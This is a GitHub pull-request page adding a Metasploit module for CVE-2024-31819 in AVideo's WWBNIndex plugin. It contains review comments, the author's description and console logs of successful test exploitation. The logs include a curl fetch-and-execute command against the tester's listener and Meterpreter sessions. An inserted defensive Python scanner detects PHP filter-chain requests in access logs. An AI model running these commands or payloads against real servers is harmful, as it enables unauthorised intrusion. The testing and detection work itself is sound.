Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin #19071
Conversation
Thanks for this module!
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Hey @Chocapikk, thanks for the module. Another great exploit making use of PhpFilterChains! I was wondering if you could please explain how you set up your I grabbed the vulnerable version from here and have tried a couple of different configurations, however I keep seeing the following message in the docker logs:
When I navigate to the endpoint the
Hey, about the log message: it's not supposed to be a problem. But it's not supposed to create any issue for vulnerability testing even with this.
Hey @Chocapikk - thanks for the response. I wasn't getting a session when testing and without doing much debugging I thought it might have had something to do with that issue I was seeing in the UI - my apologies. It turns out the vulnerable plugin isn't included in the 12.4 Release I downloaded.
I was able to check out an older branch, WWBN/AVideo#8369, in order to get a vulnerable version to test successfully.
The module works great, thanks for the submission. I left a couple comments which pretty much all stem from the possibility of being able to have a vulnerable version installed without the vulnerable plugin.
Testing
PHP Payload
msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.131:44440) at 2024-05-15 11:44:59 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit
Fetch Payload Linux
msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run
[*] Command to run on remote host: curl -so /tmp/a http://172.16.199.1:8374/Hn-8qIL46e0vZdQpIHPToA; chmod +x /tmp/a; /tmp/a &
[*] Fetch handler listening on 172.16.199.1:8374
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Client 172.16.199.131 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.131:55714) at 2024-05-15 11:46:54 -0700
meterpreter >
meterpreter > getuid
Server username: www-data
sysinfmeterpreter > sysinfo
Computer : 172.16.199.131
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…th_rce.md Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Hey @jheysel-r7, thanks for checking out my PR and for the helpful feedback! I've made the changes you suggested, and it's all looking good now. Really appreciate your help.
Anytime @Chocapikk, thanks for making those changes! I've retested and everything looks great, landing now 👍
10acd86
Release Notes
Add module for CVE-2024-31819, which exploits an LFI in AVideo and uses PHP filter chaining to turn the LFI into unauthenticated RCE.
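The release notes describe the mechanism the module relies on: a PHP filter chain (a `php://filter/...` wrapper with several stacked `convert.*` stages) delivered through a file-inclusion parameter. The following is an added defender-side example, not code from this PR or from the AVideo project, that scans web-server access logs for that pattern. It decodes URL-encoded (and double-encoded) request URIs, then distinguishes a plain `php://filter` wrapper read from a multi-stage conversion chain. The log lines, endpoint paths, parameter names and filter stages below are constructed placeholders for illustration and do not reproduce the plugin's real endpoint.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not real traffic from the PR).
# Paths and parameter names are placeholders, not AVideo's actual endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2024:11:44:59 -0700] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2024:11:45:03 -0700] "GET /index.php?page=php://filter/convert.iconv.UTF8.UTF16|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://temp HTTP/1.1" 200 0 "-" "curl/7.81.0"
203.0.113.9 - - [15/May/2024:11:45:10 -0700] "GET /index.php?file=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.UTF16%7Cconvert.base64-decode%2Fresource%3Dphp%3A%2F%2Ftemp HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.11 - - [15/May/2024:11:46:00 -0700] "GET /view.php?id=php://filter/read=string.toupper/resource=info.txt HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Conversion stages that are chained to build a payload out of an LFI; a plain
# string.* filter read does not match and is reported at a lower tier.
STAGE_RE = re.compile(r'convert\.(?:iconv|base64-(?:en|de)code|quoted-printable)')


def decode_fully(value, max_rounds=3):
    """Undo one or more layers of URL encoding (bounded to avoid looping)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_line(line, min_stages=2):
    """Classify a single access-log line.

    Returns None for unparseable lines, otherwise a dict with the client IP,
    the raw URI, the number of convert.* stages found, and a verdict of
    'benign', 'filter-wrapper' (php://filter present, no chain) or
    'filter-chain' (at least min_stages stacked conversion stages).
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_fully(m['uri']).lower()
    if 'php://filter' not in decoded:
        stages, verdict = 0, 'benign'
    else:
        stages = len(STAGE_RE.findall(decoded))
        verdict = 'filter-chain' if stages >= min_stages else 'filter-wrapper'
    return {'ip': m['ip'], 'uri': m['uri'], 'stages': stages, 'verdict': verdict}


def scan_log(text, min_stages=2):
    """Return every non-benign finding from a block of log text, in order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        result = analyze_line(line, min_stages)
        if result and result['verdict'] != 'benign':
            findings.append(result)
    return findings


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['verdict']:14} stages={hit['stages']} ip={hit['ip']} uri={hit['uri']}")
```

Decoding before matching matters: the third sample line carries the same wrapper fully percent-encoded and would be missed by a literal `php://filter` search on the raw request line. The two-tier verdict keeps single-filter reads (which also warrant a look, since they indicate a user-controlled include path) separate from the stacked conversion chains that characterise the LFI-to-RCE technique, so the higher tier can be alerted on with less noise.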
Greetings Metasploit Team,
I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.
Module Details:
This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.
I look forward to your feedback and am happy to make any required adjustments to meet the project's standards.
Thank you for considering this contribution.
Best regards,
Chocapikk